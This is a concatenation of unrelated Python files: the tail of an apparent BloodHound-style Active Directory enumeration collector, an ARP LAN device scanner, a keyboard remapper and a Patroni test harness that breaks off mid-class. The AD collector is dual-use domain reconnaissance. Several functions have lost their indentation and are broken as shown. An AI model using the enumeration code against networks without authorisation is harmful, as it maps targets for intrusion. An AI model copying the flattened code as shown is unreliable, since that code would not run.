        "IsACLProtected": False,
        "ObjectIdentifier": "%s-S-1-5-9" % rootdomain,
        "Properties": {
            "domain": rootdomain.upper(),
            "name": "ENTERPRISE DOMAIN CONTROLLERS@%s" % rootdomain,
        },
        "Members": [],
        "Aces": []
    }
    for entry in entries:
        resolved_entry = ADUtils.resolve_ad_entry(entry)
        memberdata = {
            "ObjectIdentifier": resolved_entry['objectid'],
            "ObjectType": resolved_entry['type'].capitalize()
        }
        group["Members"].append(memberdata)
    self.result_q.put(group)
    # Bug fix: `domainsid` was computed but never used below while each dict
    # re-read the attribute inline; use the local consistently.
    domainsid = self.addomain.domain_object.sid
    domainname = self.addomain.domain.upper()
    # Everyone
    evgroup = {
        "IsDeleted": False,
        "IsACLProtected": False,
        "ObjectIdentifier": "%s-S-1-1-0" % domainname,
        "Properties": {
            "domain": domainname,
            "domainsid": domainsid,
            "name": "EVERYONE@%s" % domainname,
        },
        "Members": [],
        "Aces": []
    }
    self.result_q.put(evgroup)
    # Authenticated users
    augroup = {
        "IsDeleted": False,
        "IsACLProtected": False,
        "ObjectIdentifier": "%s-S-1-5-11" % domainname,
        "Properties": {
            "domain": domainname,
            "domainsid": domainsid,
            "name": "AUTHENTICATED USERS@%s" % domainname,
        },
        "Members": [],
        "Aces": []
    }
    self.result_q.put(augroup)
    # Interactive
    iugroup = {
        "IsDeleted": False,
        "IsACLProtected": False,
        "ObjectIdentifier": "%s-S-1-5-4" % domainname,
        "Properties": {
            "domain": domainname,
            "domainsid": domainsid,
            "name": "INTERACTIVE@%s" % domainname,
        },
        "Members": [],
        "Aces": []
    }
    self.result_q.put(iugroup)
def enumerate_memberships(self, timestamp=""):
    """
    Run the appropriate enumeration passes: always users and groups, and
    additionally a DC-only computer enumeration when no collection method
    was requested that would connect to the individual computers anyway.
    """
    self.enumerate_users(timestamp)
    self.enumerate_groups(timestamp)
    computer_bound_methods = ('localadmin', 'session', 'loggedon', 'experimental')
    if not any(method in self.collect for method in computer_bound_methods):
        self.enumerate_computers_dconly(timestamp)
|
discover_devices.py | """
Module Name:
discover_devices.py
Description:
Module provides functionality to search (discover) devices in local network
and store devices' data on the SQLite3 database.
Authors:
Columbia University, the Internet Real-Time Lab (IRT Lab). 2018-2019.
"""
import gevent
import random
import time
import sys
import ipaddress
import re
import subprocess
import netifaces
import traceback
import threading
from scapy.all import srp, Ether, ARP
from datetime import datetime
import db
import utils
def search_network_devices(db_connection, net_interfaces):
    """
    Function searches devices in the given network and stores/updates devices'
    data on the SQLite3 database. One worker thread is started per interface;
    the threads are fire-and-forget (never joined) and loop indefinitely.

    Arguments:
    - db_connection: SQLite3 database connection.
    - net_interfaces: A list of network interfaces' data. Every single element of
      list is dictionary and format is {'ip': <ip addr>, 'iface': <iface name>}.
    """
    if not net_interfaces:
        utils.print_error('Please provide network interface(s)')
        sys.exit()
    if not db_connection:
        utils.print_error('SQLite3 database is not connected')
        sys.exit()
    try:
        utc_time_now = str(datetime.utcnow())
        print('[' + utc_time_now + '] ' + 'Start searching devices in local network .........')
        # Bug fix: removed the unused `start = datetime.now()` stopwatch local.
        for iface_data in net_interfaces:
            iface_thr = threading.Thread(target = discover_devices, args = (db_connection, iface_data))
            iface_thr.start()
    except Exception:
        # Bug fix: narrowed from a bare `except:`, which would also swallow
        # SystemExit/KeyboardInterrupt.
        utils.print_error('An exception occurred in discovering devices functionality')
        traceback.print_exc()
def discover_devices(db_connection, iface_data):
    """
    Determine the IPv4 subnet configured on one network interface and scan
    every host address in it (except our own).

    Arguments:
    - db_connection: SQLite3 database connection.
    - iface_data: A network interface data ({'ip': ..., 'iface': <name>}).
    """
    # First AF_INET configuration of the interface: address + netmask.
    cfg = netifaces.ifaddresses(iface_data['iface'])[netifaces.AF_INET][0]
    my_ip = cfg['addr']
    # strict=False allows host bits to be set (we pass our own address).
    subnet = ipaddress.IPv4Network('%s/%s' % (my_ip, cfg['netmask']), strict=False)
    if subnet.prefixlen >= 24 and subnet.prefixlen < 32:
        # Get a list of all IP addresses that belong to the IP subnet on
        # the interface, sans the IP address of our own network
        # interface.
        devices = [str(ip) for ip in subnet.hosts() if str(ip) != my_ip]
        search_devices(db_connection, devices, iface_data['iface'])
    else:
        # Larger prefixes would mean scanning thousands of hosts; refuse.
        utils.print_error('Error: currently system supports only /24 <= X < /32 IPv4 prefixes')
def search_devices(db_connection, ip_list, iface):
    """
    Spawn one gevent greenlet per IPv4 address, each running request() to
    probe the address and persist the result, then wait for all of them.
    (Greenlets make the per-host probing non-blocking.)

    Arguments:
    - db_connection: SQLite3 database connection.
    - ip_list: A list of IPv4 addresses to be requested parallel (non-blocking).
    - iface: Network interface name.
    """
    threads = []
    for ip_addr in ip_list:
        ip_addr = str(ip_addr)
        threads.append(gevent.spawn(request, db_connection, iface, ip_addr))
    # request() loops forever, so in practice this blocks indefinitely.
    gevent.joinall(threads)
def request(db_connection, iface, ip_addr):
    """
    Function does ARP request for given IPv4 address, constructs device data
    (MAC, IPv4, network interface name and timestamp) based on ARP response and
    stores and/or updates on the database. Loops forever, one probe per round.

    Arguments:
    - db_connection: SQLite3 database connection.
    - iface: Network interface name.
    - ip_addr: IPv4 address.
    """
    hostname = ''
    while True:  # idiomatic spelling of the original `while 1`
        try:
            result = arp_request(ip_addr, iface)
            if result:
                ip_addr = result[0]
                mac_addr = result[1]
                utc_time_now = utils.get_unix_epoch_milliseconds()
                # The idea is NOT to call get_device_hostname() function if we already
                # got hostname.
                if not hostname:
                    hostname = get_device_hostname(mac_addr)
                data = {'mac': mac_addr, 'ip': ip_addr, 'hostname': hostname, 'iface': iface, 'last_update': utc_time_now}
                db.update_device_data(db_connection, data)
        except Exception:
            # Bug fix: narrowed from a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt. This polling is deliberately
            # best-effort, so ordinary errors are still ignored.
            pass
        # Sleep 2 seconds plus a random jitter of 2..501 milliseconds before
        # starting the next round.
        wait_millisecond = float(random.randint(2, 501)) / float(1000)
        wait_millisecond = float(2) + wait_millisecond
        time.sleep(wait_millisecond)
def arp_request(ip_addr, iface, timeout = 3):
"""
Function does ARP request to check if given IPv4 is up or down.
The fastest way to discover hosts on a local Ethernet network is to use
the Scapy's ARP Ping method.
Arguments:
- ip_addr: An IPv4 address. If given argument is empty string or undefined
it returns empty Tuple.
- iface: Network interface name.
- timeout: The timeout parameter of srp function specifies the time to wait
after the last packet has been sent. If there is, no response a None value
will be assigned instead when the timeout is reached.
Returns Tuple (IPv4 address, MAC address) if IPv4 is up and response contains
IPv4 and MAC, otherwise empty Tuple.
"""
if not ip_addr:
return tuple()
# TODO We may need to implement our own ARP request instead of using Scapy.
answered, unanswered = srp(Ether(dst = "ff:ff:ff:ff:ff:ff") / ARP(pdst = ip_addr), iface = iface, timeout = timeout, verbose = False)
if answered:
for send, receive in answered:
mac_address = receive.sprintf(r"%Ether.src%")
ip_address = receive.sprintf(r"%ARP.psrc%")
if mac_address and ip_address:
return (ip_address, mac_address)
return tuple()
def get_device_hostname(dev_mac):
    """
    Function runs the arp command, filters hostnames by MAC addresses, and
    returns the hostname (Address column) if it finds one, otherwise returns
    an empty string.

    Arguments:
    - dev_mac: MAC address of device.
    """
    # The command is a constant string, so shell=True carries no injection
    # risk here; kept for behavioral compatibility (missing binary yields
    # empty output instead of raising).
    completed = subprocess.run("arp", shell = True, stdout = subprocess.PIPE)
    arp_table = (completed.stdout).splitlines()
    list_length = len(arp_table)
    # First element is just the header line.
    if list_length < 2:
        # Bug fix: previously `return;` returned None here, contradicting the
        # documented empty-string contract; always return a string.
        return ''
    # Skip first line as it contains Address, HWtype, HWaddress, Flags Mask
    # and Iface.
    for i in range(1, list_length):
        arp_table[i] = arp_table[i].decode("utf-8")
        arp_table_dev_data = re.split(r'\s{2,}', arp_table[i])
        # Make sure that it was parsed correct. After parsing a list should contain
        # following data:
        # list = ['192.168.1.174', 'ether', 'b0:e1:7e:c2:8c:8f', 'C', 'enp0s3']
        # list[0] is Address
        # list[1] is HWtype
        # list[2] is HWaddres
        # list[3] is Flags
        # list[4] is Iface
        if arp_table_dev_data and len(arp_table_dev_data) == 5:
            if dev_mac == arp_table_dev_data[2]:
                return arp_table_dev_data[0]
    return ''
|
main-keyboard-remapper.py | #!/usr/bin/python3
#
# Remapper for Topre Realfoce and the thinkpad internal keyboard.
#
import os
import sys
import threading
import time
import evdev
from evdev import ecodes as ec
import key_remapper
# Name shown by the remapper framework (tray/notifications).
NAME = "Main Keyboard Remapper"
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
# Icon shipped next to this script.
ICON = os.path.join(SCRIPT_PATH, 'res/keyboard.png')

# Regex matched against evdev device names to pick which keyboards to remap:
# AT Translated Set 2 keyboard -> thinkpad internal keyboard
# Topre Corporation Realforce -> Realforce
# P. I. Engineering XK-16 HID -> An external 8-key keyboard
DEFAULT_DEVICE_NAME = "^(AT Translated Set 2 keyboard|Topre Corporation Realforce|P. I. Engineering XK-16 HID)"

# Verbose logging toggle used throughout this module.
debug = False

# ESC + These keys will generate SHIFT+ALT+CTRL+META+[THE KEY]. I launch apps using them -- e.g. ESC+ENTER to launch
# Chrome.
VERSATILE_KEYS = (
    ec.KEY_F1,
    ec.KEY_F2,
    ec.KEY_F3,
    ec.KEY_F4,
    ec.KEY_F5,
    ec.KEY_F6,
    ec.KEY_F7,
    ec.KEY_F8,
    ec.KEY_F9,
    ec.KEY_F10,
    ec.KEY_F11,
    ec.KEY_F12,
    ec.KEY_ENTER,
)

# Plain letter keys; ESC + one of these becomes CTRL+SHIFT+<key> (see Remapper).
ALPHABET_KEYS = (
    ec.KEY_A,
    ec.KEY_B,
    ec.KEY_C,
    ec.KEY_D,
    ec.KEY_E,
    ec.KEY_F,
    ec.KEY_G,
    ec.KEY_H,
    ec.KEY_I,
    ec.KEY_J,
    ec.KEY_K,
    ec.KEY_L,
    ec.KEY_M,
    ec.KEY_N,
    ec.KEY_O,
    ec.KEY_P,
    ec.KEY_Q,
    ec.KEY_R,
    ec.KEY_S,
    ec.KEY_T,
    ec.KEY_U,
    ec.KEY_V,
    ec.KEY_W,
    ec.KEY_X,
    ec.KEY_Y,
    ec.KEY_Z,
)
class Wheeler:
    """Send mouse wheel events periodically.

    A daemon thread injects EV_REL wheel events while a non-zero vertical or
    horizontal speed is set, and sleeps on an Event while idle.
    """
    def __init__(self, uinput: key_remapper.SyncedUinput):
        self.__lock = threading.Lock()
        self.uinput: key_remapper.SyncedUinput = uinput
        self.__wheel_thread = threading.Thread(name='wheel-thread', target=self.__do_wheel)
        # Fix: Thread.setDaemon() is deprecated since Python 3.10; assign the
        # daemon attribute directly instead.
        self.__wheel_thread.daemon = True
        self.__event = threading.Event()
        self.__vwheel_speed = 0  # Vertical wheel speed and direction: ..., -1, 0, 1, ....
        self.__hwheel_speed = 0  # Horizontal wheel speed and direction (comment fix: was mislabeled "Vertical").
        # NOTE(review): despite the *_ms suffix these values are SECONDS
        # (they are passed to time.sleep()); 0.020 == 20ms, 0.005 == 5ms.
        self.wheel_repeat_delay_normal_ms = 0.020
        self.wheel_repeat_delay_fast_ms = 0.005
        self.wheel_make_fast_after_this_many_events = 10

    def __do_wheel(self):
        """Worker loop: inject wheel events while a speed is non-zero.

        Example events:
          Event: time 1608522295.791450, type 2 (EV_REL), code 8 (REL_WHEEL), value -1
          Event: time 1608522295.791450, type 2 (EV_REL), code 11 (REL_WHEEL_HI_RES), value -120
        """
        consecutive_event_count = 0
        while True:
            # Snapshot the speeds under the lock.
            with self.__lock:
                vspeed = self.__vwheel_speed
                hspeed = self.__hwheel_speed
            # (Cleanup: removed a dead `if False:` debug print block.)
            if vspeed != 0:
                self.uinput.send_event(ec.EV_REL, ec.REL_WHEEL, vspeed)
                self.uinput.send_event(ec.EV_REL, ec.REL_WHEEL_HI_RES, vspeed * 120)
            if hspeed != 0:
                self.uinput.send_event(ec.EV_REL, ec.REL_HWHEEL, hspeed)
                self.uinput.send_event(ec.EV_REL, ec.REL_HWHEEL_HI_RES, hspeed * 120)
            if vspeed == 0 and hspeed == 0:
                # Idle: block until a set_vwheel()/set_hwheel() call wakes us.
                consecutive_event_count = 0
                self.__event.wait()
                self.__event.clear()
            else:
                # Speed up the repeat rate after a few consecutive events.
                consecutive_event_count += 1
                delay = self.wheel_repeat_delay_normal_ms
                if consecutive_event_count > self.wheel_make_fast_after_this_many_events:
                    delay = self.wheel_repeat_delay_fast_ms
                time.sleep(delay)

    def start(self):
        self.__wheel_thread.start()

    def set_vwheel(self, speed: int):
        """Set vertical scroll speed/direction; 0 stops scrolling."""
        if debug: print(f'# vwheel: {speed}')
        with self.__lock:
            self.__vwheel_speed = speed
        self.__event.set()

    def set_hwheel(self, speed: int):
        """Set horizontal scroll speed/direction; 0 stops scrolling."""
        if debug: print(f'# hwheel: {speed}')
        with self.__lock:
            self.__hwheel_speed = speed
        self.__event.set()

    def stop(self):
        # Stop scrolling; the worker thread parks on its Event.
        self.set_vwheel(0)
        self.set_hwheel(0)
class Remapper(key_remapper.BaseRemapper):
    """Key remapping rules for the thinkpad internal keyboard, the Realforce
    and the XK-16 pad. on_handle_event() receives every key event from the
    matched devices and rewrites or forwards it.
    """
    def __init__(self):
        super().__init__(NAME, ICON, DEFAULT_DEVICE_NAME)
        # True while an ESC key-down has been seen but not yet resolved into
        # either a real ESC press or an ESC+<key> combo.
        self.pending_esc_press = False

    def on_initialize(self):
        super().on_initialize()
        # Dedicated uinput mouse device used only for synthesized wheel events.
        self.wheeler = Wheeler(self.new_mouse_uinput("_wheel"))
        self.wheeler.start()

    def on_device_lost(self):
        super().on_device_lost()
        self.wheeler.stop()

    def is_chrome(self):
        # True when the focused window's WM class group is Google Chrome.
        title, class_group_name, class_instance_name = self.get_active_window()
        return class_group_name == "Google-chrome"

    def on_handle_event(self, device: evdev.InputDevice, ev: evdev.InputEvent):
        # Only key events are remapped; everything else is ignored here.
        if ev.type != ec.EV_KEY:
            return
        # Identify the source device by name prefix (see DEFAULT_DEVICE_NAME).
        is_thinkpad = device.name.startswith('AT')
        is_xkeys = device.name.startswith('P. I.')
        # For x-keys. Convert to Shift+Ctrl+[number]
        if is_xkeys:
            # Special casing the first two keys.
            # NOTE(review): 'a' presumably means "with ALT" in press_key's
            # modifier string — confirm against key_remapper.
            if self.matches_key(ev, ec.KEY_1, 1, ''): self.press_key(ec.KEY_LEFT, 'a', done=True)
            if self.matches_key(ev, ec.KEY_2, 1, ''): self.press_key(ec.KEY_RIGHT, 'a', done=True)
            # Default setting...
            # These 8 keys send KEY_1 .. KEY_8, per my configuration.
            # Convert them into Shift+Ctrl+Alt+Meta+KEY
            if ev.value == 1:
                self.send_key_events(
                    (ec.KEY_LEFTSHIFT, 1),
                    (ec.KEY_LEFTCTRL, 1),
                    (ec.KEY_LEFTALT, 1),
                    (ec.KEY_LEFTMETA, 1),
                )
            self.send_ievent(ev)
            if ev.value == 0:
                self.send_key_events(
                    (ec.KEY_LEFTSHIFT, 0),
                    (ec.KEY_LEFTCTRL, 0),
                    (ec.KEY_LEFTALT, 0),
                    (ec.KEY_LEFTMETA, 0),
                )
            return
        # Thinkpad only: Use ins/del as pageup/down, unless CAPS is pressed.
        if is_thinkpad and not self.is_caps_pressed():
            if ev.code == ec.KEY_INSERT: ev.code = ec.KEY_PAGEUP
            elif ev.code == ec.KEY_DELETE: ev.code = ec.KEY_PAGEDOWN
        # Special ESC handling: Don't send "ESC-press" at key-down, but instead send it on key-*up*, unless
        # any keys are pressed between the down and up.
        # This allows to make "ESC + BACKSPACE" act as a DEL press without sending ESC.
        if ev.code == ec.KEY_ESC:
            if ev.value == 1:
                self.pending_esc_press = True
            if ev.value in (1, 2):
                return  # Ignore ESC down (and auto-repeat).
            # Here, ev.value must be 0.
            if self.pending_esc_press:
                self.pending_esc_press = False
                self.press_key(ec.KEY_ESC, reset_all_keys=False, done=True)
        else:
            # In order to allow combos like "ESC+ctrl+Backspace", don't clear pending ESC when modifier keys
            # are pressed.
            if ev.code not in (
                ec.KEY_LEFTALT, ec.KEY_RIGHTALT,
                ec.KEY_LEFTCTRL, ec.KEY_RIGHTCTRL,
                ec.KEY_LEFTSHIFT, ec.KEY_RIGHTSHIFT,
                ec.KEY_LEFTMETA, ec.KEY_RIGHTMETA,
                ec.KEY_CAPSLOCK
            ):
                self.pending_esc_press = False
        # ESC (or shift) + backspace -> delete
        if self.matches_key(ev, ec.KEY_BACKSPACE, (1, 2), 'e'): self.press_key(ec.KEY_DELETE, done=True)
        if self.matches_key(ev, ec.KEY_BACKSPACE, (1, 2), 's'): self.press_key(ec.KEY_DELETE, done=True)
        # For chrome: -----------------------------------------------------------------------------------
        # F5 -> back
        # F6 -> forward
        if self.matches_key(ev, ec.KEY_F5, 1, '', self.is_chrome): self.press_key(ec.KEY_BACK, done=True)
        if self.matches_key(ev, ec.KEY_F6, 1, '', self.is_chrome): self.press_key(ec.KEY_FORWARD, done=True)
        # Global keys -----------------------------------------------------------------------------------
        # See VERSATILE_KEYS.
        if self.matches_key(ev, VERSATILE_KEYS, 1, 'e'): self.press_key(ev.code, 'acsw', done=True)
        # ESC + home/end -> ATL+Left/Right (back / forward)
        if self.matches_key(ev, ec.KEY_HOME, 1, 'e'): self.press_key(ec.KEY_LEFT, 'a', done=True)
        if self.matches_key(ev, ec.KEY_END, 1, 'e'): self.press_key(ec.KEY_RIGHT, 'a', done=True)
        # ESC + Pageup -> ctrl + pageup (prev tab)
        # ESC + Pagedown -> ctrl + pagedown (next tab)
        # (meaning ESC + ins/del act as them too on thinkpad.)
        if self.matches_key(ev, ec.KEY_PAGEUP, 1, 'e'): self.press_key(ec.KEY_PAGEUP, 'c', done=True)
        if self.matches_key(ev, ec.KEY_PAGEDOWN, 1, 'e'): self.press_key(ec.KEY_PAGEDOWN, 'c', done=True)
        # ESC + caps lock -> caps lock, in case I ever need it.
        if self.matches_key(ev, ec.KEY_CAPSLOCK, 1, 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_CAPSLOCK, done=True)
        # # ESC + H / J / K / L -> LEFT, DOWN, UP, RIGHT
        # if self.matches_key(ev, ec.KEY_H, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_LEFT, "*", done=True)
        # if self.matches_key(ev, ec.KEY_J, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_DOWN, "*", done=True)
        # if self.matches_key(ev, ec.KEY_K, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_UP, "*", done=True)
        # if self.matches_key(ev, ec.KEY_L, (1, 2), 'e', ignore_other_modifiers=True): self.press_key(ec.KEY_RIGHT, "*", done=True)
        # ESC + H / J / K / L -> emulate wheel. Also support ESC+SPACE / C for left-hand-only scrolling.
        if self.matches_key(ev, (ec.KEY_J, ec.KEY_K, ec.KEY_SPACE, ec.KEY_C), (1, 0), 'e', ignore_other_modifiers=True):
            if ev.value == 0:
                self.wheeler.set_vwheel(0)
            elif ev.code in (ec.KEY_K, ec.KEY_C):  # Scroll up
                self.wheeler.set_vwheel(1)
            elif ev.code in (ec.KEY_J, ec.KEY_SPACE):  # Scroll down
                self.wheeler.set_vwheel(-1)
            return
        if self.matches_key(ev, (ec.KEY_L, ec.KEY_H), (1, 0), 'e', ignore_other_modifiers=True):
            if ev.value == 0:
                self.wheeler.set_hwheel(0)
            elif ev.code == ec.KEY_L:  # Scroll right
                self.wheeler.set_hwheel(1)
            elif ev.code == ec.KEY_H:  # Scroll left
                self.wheeler.set_hwheel(-1)
            return
        # ESC + other alphabet -> ctrl + shift + the key.
        if self.matches_key(ev, ALPHABET_KEYS, 1, 'e'): self.press_key(ev.code, 'cs', done=True)
        # Don't use capslock alone.
        if ev.code == ec.KEY_CAPSLOCK: return
        # Send the original event.
        self.send_ievent(ev)
def main(args):
    """Entry point: build the remapper and hand it the command-line args."""
    Remapper().main(args)


if __name__ == '__main__':
    main(sys.argv[1:])
|
environment.py | import abc
import datetime
import os
import json
import shutil
import signal
import six
import subprocess
import sys
import tempfile
import threading
import time
import yaml
import patroni.psycopg as psycopg
from six.moves.BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
@six.add_metaclass(abc.ABCMeta)
class AbstractController(object):
    """Base class for anything the test harness runs as a child process.

    Subclasses provide _start() (spawn the process) and _is_accessible()
    (the process answers queries); this class handles the lifecycle, logs
    output to <output_dir>/<name>.log, and scales every timeout by the
    context's timeout_multiplier.
    """
    def __init__(self, context, name, work_directory, output_dir):
        self._context = context
        self._name = name
        self._work_directory = work_directory
        self._output_dir = output_dir
        self._handle = None  # Popen handle, set by start()
        self._log = None     # log file object, opened lazily in start()

    def _has_started(self):
        # The Popen handle exists and the process has not exited yet.
        return self._handle and self._handle.pid and self._handle.poll() is None

    def _is_running(self):
        return self._has_started()

    @abc.abstractmethod
    def _is_accessible(self):
        """process is accessible for queries"""

    @abc.abstractmethod
    def _start(self):
        """start process"""

    def start(self, max_wait_limit=5):
        """Start the process and poll (1s interval) until it answers queries.

        Raises AssertionError if the process fails to start or does not
        become accessible within max_wait_limit (scaled) seconds.
        """
        if self._is_running():
            return True
        self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a')
        self._handle = self._start()
        assert self._has_started(), "Process {0} is not running after being started".format(self._name)
        max_wait_limit *= self._context.timeout_multiplier
        for _ in range(max_wait_limit):
            if self._is_accessible():
                break
            time.sleep(1)
        else:
            # for/else: only reached when the loop never hit `break`.
            assert False,\
                "{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit)

    def stop(self, kill=False, timeout=15, _=False):
        """Terminate the process, escalating to SIGKILL after `timeout` (scaled)."""
        term = False
        start_time = time.time()
        timeout *= self._context.timeout_multiplier
        while self._handle and self._is_running():
            if kill:
                self._handle.kill()
            elif not term:
                # Send SIGTERM once; keep polling until exit.
                self._handle.terminate()
                term = True
            time.sleep(1)
            if not kill and time.time() - start_time > timeout:
                kill = True
        if self._log:
            self._log.close()

    def cancel_background(self):
        # Hook for subclasses that keep background helpers; default is a no-op.
        pass
class PatroniController(AbstractController):
__PORT = 5360
PATRONI_CONFIG = '{}.yml'
""" starts and stops individual patronis"""
def __init__(self, context, name, work_directory, output_dir, custom_config=None):
super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir)
PatroniController.__PORT += 1
self._data_dir = os.path.join(work_directory, 'data', name)
self._connstring = None
if custom_config and 'watchdog' in custom_config:
self.watchdog = WatchdogMonitor(name, work_directory, output_dir)
custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'}
else:
self.watchdog = None
self._scope = (custom_config or {}).get('scope', 'batman')
self._config = self._make_patroni_test_config(name, custom_config)
self._closables = []
self._conn = None
self._curs = None
def write_label(self, content):
with open(os.path.join(self._data_dir, 'label'), 'w') as f:
f.write(content)
def read_label(self, label):
try:
with open(os.path.join(self._data_dir, label), 'r') as f:
return f.read().strip()
except IOError:
return None
@staticmethod
def recursive_update(dst, src):
for k, v in src.items():
if k in dst and isinstance(dst[k], dict):
PatroniController.recursive_update(dst[k], v)
else:
dst[k] = v
def update_config(self, custom_config):
with open(self._config) as r:
config = yaml.safe_load(r)
self.recursive_update(config, custom_config)
with open(self._config, 'w') as w:
yaml.safe_dump(config, w, default_flow_style=False)
self._scope = config.get('scope', 'batman')
def add_tag_to_config(self, tag, value):
self.update_config({'tags': {tag: value}})
def _start(self):
if self.watchdog:
self.watchdog.start()
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.create_pod(self._name[8:], self._scope)
os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1]
return subprocess.Popen([sys.executable, '-m', 'coverage', 'run',
'--source=patroni', '-p', 'patroni.py', self._config],
stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory)
def stop(self, kill=False, timeout=15, postgres=False):
if postgres:
return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w'])
super(PatroniController, self).stop(kill, timeout)
if isinstance(self._context.dcs_ctl, KubernetesController):
self._context.dcs_ctl.delete_pod(self._name[8:])
if self.watchdog:
self.watchdog.stop()
def _is_accessible(self):
cursor = self.query("SELECT 1", fail_ok=True)
if cursor is not None:
cursor.execute("SET synchronous_commit TO 'local'")
return True
def _make_patroni_test_config(self, name, custom_config):
patroni_config_name = self.PATRONI_CONFIG.format(name)
patroni_config_path = os.path.join(self._output_dir, patroni_config_name)
with open(patroni_config_name) as f:
config = yaml.safe_load(f)
config.pop('etcd', None)
raft_port = os.environ.get('RAFT_PORT')
if raft_port:
os.environ['RAFT_PORT'] = str(int(raft_port) + 1)
config['raft'] = {'data_dir': self._output_dir, 'self_addr': 'localhost:' + os.environ['RAFT_PORT']}
host = config['postgresql']['listen'].split(':')[0]
config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT)
config['name'] = name
config['postgresql']['data_dir'] = self._data_dir
config['postgresql']['basebackup'] = [{'checkpoint': 'fast'}]
config['postgresql']['use_unix_socket'] = os.name != 'nt' # windows doesn't yet support unix-domain sockets
config['postgresql']['use_unix_socket_repl'] = os.name != 'nt' # windows doesn't yet support unix-domain sockets
config['postgresql']['pgpass'] = os.path.join(tempfile.gettempdir(), 'pgpass_' + name)
config['postgresql']['parameters'].update({
'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir,
'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1',
'unix_socket_directories': tempfile.gettempdir()})
if 'bootstrap' in config:
config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"'
if 'initdb' in config['bootstrap']:
config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}])
if custom_config is not None:
self.recursive_update(config, custom_config)
self.recursive_update(config, {
'bootstrap': {'dcs': {'postgresql': {'parameters': {'wal_keep_segments': 100}}}}})
if config['postgresql'].get('callbacks', {}).get('on_role_change'):
config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT)
with open(patroni_config_path, 'w') as f:
yaml.safe_dump(config, f, default_flow_style=False)
user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {})
self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user}
self._connkwargs.update({'host': host, 'port': self.__PORT, 'dbname': 'postgres'})
self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {})
self._replication.update({'host': host, 'port': self.__PORT, 'dbname': 'postgres'})
return patroni_config_path
def _connection(self):
if not self._conn or self._conn.closed != 0:
self._conn = psycopg.connect(**self._connkwargs)
self._conn.autocommit = True
return self._conn
def _cursor(self):
if not self._curs or self._curs.closed or self._curs.connection.closed != 0:
self._curs = self._connection().cursor()
return self._curs
def query(self, query, fail_ok=False):
try:
cursor = self._cursor()
cursor.execute(query)
return cursor
except psycopg.Error:
if not fail_ok:
raise
def check_role_has_changed_to(self, new_role, timeout=10):
bound_time = time.time() + timeout
recovery_status = new_role != 'primary'
while time.time() < bound_time:
cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True)
if cur:
row = cur.fetchone()
if row and row[0] == recovery_status:
return True
time.sleep(1)
return False
def get_watchdog(self):
return self.watchdog
def _get_pid(self):
try:
pidfile = os.path.join(self._data_dir, 'postmaster.pid')
if not os.path.exists(pidfile):
return None
return int(open(pidfile).readline().strip())
except Exception:
return None
def patroni_hang(self, timeout):
    """Suspend the Patroni process (via SIGSTOP) for up to *timeout* seconds
    in the background; the helper is registered so cancel_background() can
    resume the process early."""
    hang_thread = ProcessHang(self._handle.pid, timeout)
    self._closables.append(hang_thread)
    hang_thread.start()
def cancel_background(self):
    """Close every registered background helper, then forget all of them."""
    for closable in self._closables:
        closable.close()
    self._closables = []
@property
def backup_source(self):
    """Connection URI for pg_basebackup, built from the replication credentials."""
    template = 'postgres://{username}:{password}@{host}:{port}/{dbname}'
    return template.format(**self._replication)
def backup(self, dest=os.path.join('data', 'basebackup')):
    """Take a base backup of this node into *dest* (relative to the work directory)."""
    args = PatroniPoolController.BACKUP_SCRIPT + [
        '--walmethod=none',
        '--datadir=' + os.path.join(self._work_directory, dest),
        '--dbname=' + self.backup_source,
    ]
    subprocess.call(args)
class ProcessHang(object):

    """A background thread that emulates a process hang.

    The target pid is SIGSTOPped until the timeout elapses or close() is
    called, at which point it is SIGCONTed again.
    """

    def __init__(self, pid, timeout):
        self.pid = pid
        self.timeout = timeout
        self._cancelled = threading.Event()
        self._thread = threading.Thread(target=self.run)

    def start(self):
        # Kick off the suspend/resume cycle in the background.
        self._thread.start()

    def run(self):
        os.kill(self.pid, signal.SIGSTOP)
        try:
            self._cancelled.wait(self.timeout)
        finally:
            # Always resume the process, even if the wait was interrupted.
            os.kill(self.pid, signal.SIGCONT)

    def close(self):
        self._cancelled.set()
        self._thread.join()
class AbstractDcsController(AbstractController):

    """Base class for the DCS (etcd/consul/zookeeper/...) test harness controllers."""

    _CLUSTER_NODE = '/service/{0}'

    def __init__(self, context, mktemp=True):
        # Only allocate a scratch directory when this controller owns its data.
        work_directory = tempfile.mkdtemp() if mktemp else None
        super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir)

    def _is_accessible(self):
        return self._is_running()

    def stop(self, kill=False, timeout=15):
        """Terminate the process and wipe the temp work directory, but only if we actually started it."""
        super(AbstractDcsController, self).stop(kill=kill, timeout=timeout)
        if self._work_directory:
            shutil.rmtree(self._work_directory)

    def path(self, key=None, scope='batman'):
        node = self._CLUSTER_NODE.format(scope)
        return node + ('/' + key if key else '')

    @abc.abstractmethod
    def query(self, key, scope='batman'):
        """Query for a value of a given key."""

    @abc.abstractmethod
    def cleanup_service_tree(self):
